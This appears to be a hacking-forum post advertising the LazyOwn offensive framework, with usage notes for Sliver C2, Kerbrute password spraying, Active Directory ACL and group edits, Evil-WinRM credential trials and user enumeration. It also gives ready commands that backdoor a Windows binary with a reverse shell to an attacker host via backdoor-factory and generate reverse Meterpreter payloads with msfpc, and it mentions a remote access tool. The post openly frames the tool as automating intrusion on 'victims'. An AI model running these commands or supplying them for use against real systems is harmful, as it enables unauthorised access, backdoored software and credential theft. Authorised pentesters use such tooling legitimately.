Indetectables

LazyOwn Framework is a powerful and versatile security framework designed to automate and streamline pentesting and vulnerability analysis tasks. This interactive environment combines multiple tools and scripts, making it easier for cybersecurity professionals to work through various stages of the security assessment lifecycle. With an intuitive command-line interface, LazyOwn allows users to configure specific parameters, execute custom scripts, and obtain real-time results, all from a single platform.Key Features:Interactive Interface:Interactive shell with user-friendly commands for configuring and running scripts. Ability to display and adjust custom parameters applicable to different scripts. Task Automation:Automates common pentesting tasks such as vulnerability scanning, web application fuzzing, brute force attacks, and more. Integration with popular tools and custom scripts for comprehensive testing coverage on Parrot Sec. Real-Time Visualization:Real-time output display of script execution, allowing users to see results instantly and react swiftly. Modularity and Extensibility:Designed to be extensible, enabling users to easily add and customize scripts. Supports multiple scripting languages, including Python and Bash. Flexible Configuration:Ability to set specific parameters like IP addresses, API keys, HTTP methods, request data, and more, providing complete control over executed scripts. Typical Use:Parameter Configuration:Users can set required parameters using commands like set rhost 192.168.1.1 to define the target IP address. Script Execution:Execute predefined scripts for various tasks, such as run lazygptcli to interact with GPT using a configured prompt and API key. Results Visualization:Script results are displayed in the console in real-time, providing immediate feedback on progress and findings. Additional Modules:LazyOwn includes various specialized modules such as:lazyownrat and lazyownratcli: For running remote access tools with configurable parameters. lazyftpsniff and lazysniff: For network sniffing on specified interfaces. lazysearch_bot and lazygptcli: For interacting with search APIs and GPT-based tools. lazyhoneypot: For setting up email-based honeypots. lazynetbios: For NetBIOS enumeration across IP ranges. lazywerkzeugdebug: For testing Werkzeug in debug mode. Background:Originally designed to automate the search and analysis of binaries with special permissions on Linux and Windows systems, LazyOwn has evolved to encompass a broader range of functionalities. The project includes scripts that extract information from GTFOBins, analyze binaries on the system, and generate options based on the collected data.LazyOwn on RedditRevolutionize Your Pentesting with LazyOwn: Automate the intrusion on Linux, MAC OSX, and Windows VICTIMS

[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados] 
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]

Some commands aotomated by the app:

## sliver_server
Starts the Sliver server and generates a client configuration file for connecting clients.
Provides options to download the Sliver client for Windows, Linux, or macOS.

Usage:
sliver-server [flags]
sliver-client [command]

This function installs Sliver if it is not already installed, starts the Sliver server,
generates the necessary certificates, and creates a client configuration file.
It also provides options to download the client for different operating systems.

Parameters:
line (str): The command line input for the function (not used directly in the current implementation).

Returns:
None

Example:
To start the Sliver server, generate the necessary certificates, and download the client,
run this function. Choose the appropriate client download option based on the operating system.

## gencert
Generates a certificate authority (CA), client certificate, and client key.

Returns:
str: Paths to the generated CA certificate, client certificate, and client key.

## kerbrute
Executes the Kerbrute tool to enumerate user accounts against a specified target domain controller.

This function performs the following actions:
1. Retrieves necessary parameters such as the target URL and remote host (rhost).
2. Determines the domain based on the provided URL.
3. Validates the remote host address.
4. Constructs and executes the Kerbrute command to enumerate user accounts, saving the results in the sessions/users.txt file.

Parameters:
line (str): Specify 'pass' to use credentials from 'credentials.txt' for password spraying, 'brute' to brute force using 'users.txt' and the RockYou wordlist, or leave empty for default behavior.

Returns:
None

Example:
To enumerate user accounts using Kerbrute, ensure Kerbrute is in your path,
then run this function to perform the enumeration.

Note:
- The function assumes that the Kerbrute binary (kerbrute_linux_amd64) is present in the system's PATH.
- The file sessions/users.txt should exist and contain the list of usernames to enumerate.

## dacledit
Execute the dacledit.py command for a specific user or all users listed in the users.txt file.

This function interacts with the DACL editor to modify access control lists in an Active Directory environment.
It allows the user to select a specific user from the list or execute the command for all users.
Install impacket suit to get this script in the examples
Args:
line (str): The organizational unit (OU) in the format 'OU=EXAMPLE,DC=DOMAIN,DC=EXT'. If not provided, the user is prompted to enter it.

Returns:
None

Workflow:
1. Extract parameters and set up paths.
2. Check the reachability of the remote host.
3. Prompt the user for an OU if not provided.
4. Check if the users.txt file exists and read the list of users.
5. Display the list of users and prompt the user to select a specific user.
6. Execute the dacledit.py command for the selected user or all users.

Raises:
FileNotFoundError: If the users.txt file does not exist.

Example:
To execute the command for a specific user:
>>> do_dacledit("MARKETING DIGITAL")

To execute the command for all users:
>>> do_dacledit("")

## bloodyAD
Execute the bloodyAD.py command for a specific user or all users listed in the users.txt file.

This function interacts with BloodyAD to add users to a group in an Active Directory environment.
It allows the user to select a specific user from the list or execute the command for all users.
(use download_external option 48 to clone the repo)
Args:
line (str): The organizational unit (OU) in the format 'CN=EXAMPLE,DC=DOMAIN,DC=EXT'.
If not provided, the user is prompted to enter it.

Returns:
None

Workflow:
1. Extract parameters and set up paths.
2. Check the reachability of the remote host.
3. Prompt the user for a CN if not provided.
4. Check if the users.txt file exists and read the list of users.
5. Display the list of users and prompt the user to select a specific user.
6. Execute the bloodyAD.py command for the selected user or all users.

Raises:
FileNotFoundError: If the users.txt file does not exist.

Example:
To execute the command for a specific user:
>>> do_bloodyAD("")

To execute the command for all users:
>>> do_bloodyAD("")

## evilwinrm
Executes the Evil-WinRM tool to attempt authentication against the specified target.

This function performs the following actions:
1. Checks if the provided target host (`rhost`) is valid.
2. If the `line` argument is "pass", it reads credentials from the `credentials.txt` file and attempts authentication for each user-password pair using Evil-WinRM.
3. If `line` is not "pass", it prints an error message indicating the correct usage.

Parameters:
line (str): A command argument to determine the action.
If "pass", the function reads credentials from the `credentials.txt` file and attempts to authenticate.
If not "pass", it prints an error message with usage instructions.

Returns:
None

## getTGT
Requests a Ticket Granting Ticket (TGT) using the Impacket tool with provided credentials.

This function performs the following actions:
1. Checks if the provided target host (`rhost`) is valid.
2. Reads credentials from the `credentials.txt` file.
3. Uses each credential (username and password) to request a TGT with the Impacket tool.
4. Constructs and executes the Impacket command to obtain a TGT for each set of credentials.

Parameters:
line (str): A command line argument, not used in this implementation.

Returns:
None

## apache_users
Performs enumeration of users from a target system using `apache-users`.

1. Executes the `apache-users` command with the `-h` option to specified target.

:param line: This parameter is not used in the current implementation but could be used to pass additional options or arguments if needed.
:param rhost: The target host for enumeration, specified in the `params` dictionary.

:returns: None

Manual execution:
To manually enumerate information from a system, use the following command:
apache-users -h <target_host> -l <wordlist> -p <apache_port> -s 0 -e 403 -t 10

Replace `<target_host>` with the IP address or hostname of the target system.

For example:
apache-users -h 192.168.1.202 -l /usr/share/wordlists/metasploit/unix_users.txt -p 80 -s 0 -e 403 -t 10

## backdoor_factory
Creates a backdoored executable using `backdoor-factory`.

This function checks if `backdoor-factory` is installed, installs it if necessary, and then uses it to
inject a reverse shell payload into a specified binary file. The binary is backdoored with a
reverse shell payload that connects back to a specified host and port.

:param line: The absolute path to the file that will be backdoored. If not provided, the user is prompted
to enter the path.

:returns: None

Manual execution:
To manually create a backdoored executable, use the following command:
backdoor-factory -f <file_path> -H <lhost> -P <lport> -s reverse_shell_tcp_inline -J -a -c -l 128 -o <output_file>

Replace `<file_path>` with the path to the binary you want to backdoor, `<lhost>` with the IP address of
the attacker’s machine, and `<lport>` with the port number to listen on. The `<output_file>` is the path
where the backdoored binary will be saved.

For example:
backdoor-factory -f /usr/share/windows-binaries/plink.exe -H 192.168.1.202 -P 4444 -s reverse_shell_tcp_inline -J -a -c -l 128 -o sessions/backdoor_factory.exe

## davtest
Tests WebDAV server configurations using `davtest`.

This function checks if `davtest` is installed and installs it if necessary. It then runs `davtest`
to perform a WebDAV server test against a specified URL or the default URL configured in `self.params`.

:param line: The URL of the WebDAV server to test. If provided, it overrides the default URL.
If not provided, the function uses the URL specified in `self.params["rhost"]`.

:returns: None

Manual execution:
To manually test a WebDAV server, use the following command:
davtest --url <url>

Replace `<url>` with the URL of the WebDAV server you want to test.

For example:
davtest --url [Enlace externo eliminado para invitados]

## msfpc
Generates payloads using MSFvenom Payload Creator (MSFPC).

This function checks if `msfpc` is installed and installs it if necessary. It then runs `msfpc`
with the specified parameters to create a payload for penetration testing.

:param line: Not used in this implementation but reserved for future use.

:returns: None

Manual execution:
To manually generate a payload using MSFPC, use the following command:
msfpc <TYPE> <DOMAIN/IP> <PORT> <CMD/MSF> <BIND/REVERSE> <STAGED/STAGELESS> <TCP/HTTP/HTTPS/FIND_PORT> <BATCH/LOOP> <VERBOSE>

Replace the placeholders with the desired values. For example:
msfpc windows 192.168.1.10 4444 reverse stageless tcp verbose

Example usage:
msfpc windows 192.168.1.10 # Windows & manual IP.
msfpc elf bind eth0 4444 # Linux, eth0's IP & manual port.
msfpc stageless cmd py https # Python, stageless command prompt.
msfpc verbose loop eth1 # A payload for every type, using eth1's IP.
msfpc msf batch wan # All possible Meterpreter payloads, using WAN IP.